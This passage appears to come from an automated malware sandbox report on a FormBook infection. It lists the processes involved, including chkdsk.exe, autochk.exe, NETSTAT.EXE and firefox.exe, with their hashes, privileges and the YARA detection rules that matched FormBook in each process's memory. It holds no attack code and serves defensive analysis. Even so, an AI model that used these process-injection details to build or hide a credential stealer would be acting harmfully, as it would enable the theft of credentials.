                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:12:15:42
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                      Imagebase:0xf80000
                                                                                                                                                      File size:16384 bytes
                                                                                                                                                      MD5 hash:A01E18A156825557A24A643A2547AA8C
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      General

                                                                                                                                                      Start time:12:15:47
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Windows\SysWOW64\autochk.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\autochk.exe
                                                                                                                                                      Imagebase:0x870000
                                                                                                                                                      File size:668160 bytes
                                                                                                                                                      MD5 hash:F88A52EB62019D6A62FDD9E08034DBD8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      General

                                                                                                                                                      Start time:12:15:48
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                      Imagebase:0x260000
                                                                                                                                                      File size:27136 bytes
                                                                                                                                                      MD5 hash:32297BB17E6EC700D0FC869F9ACAF561
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      General

                                                                                                                                                      Start time:12:15:59
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
                                                                                                                                                      Imagebase:0xa40000
                                                                                                                                                      File size:517064 bytes
                                                                                                                                                      MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:low

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >